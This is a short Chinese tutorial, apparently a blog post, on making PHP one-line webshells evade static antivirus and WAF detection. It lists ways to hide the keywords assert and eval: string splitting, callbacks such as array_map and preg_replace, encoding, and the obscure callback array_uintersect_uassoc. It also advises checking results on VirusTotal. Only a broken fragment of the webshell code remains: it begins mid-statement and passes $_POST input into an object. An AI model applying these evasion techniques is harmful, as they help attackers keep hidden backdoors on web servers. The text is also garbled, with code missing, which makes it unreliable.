一句话木马静态免杀

1.静态免杀(assert.eval)

隐藏关键字(waf检测到assert,eval这个关键词,很大概率会被检测出来,那么我们可以尝试用别的词来生成,具体的生成方式有很多种,这里列举一下常见的几种方式,其实效果都差不多。)

-1拆解合并

a");
    }
}
$obj = new me;
$obj->a = $_POST['haha'];
?>

-2调用函数(利用各种函数如array_map、array_key、preg_replace、@call_user_func、substr_replace来隐藏关键字)

-3编码

-4冷门回调函数array_uintersect_uassoc函数来回调assert

用该网站https://www.virustotal.com/测试

你可能感兴趣的:(安全)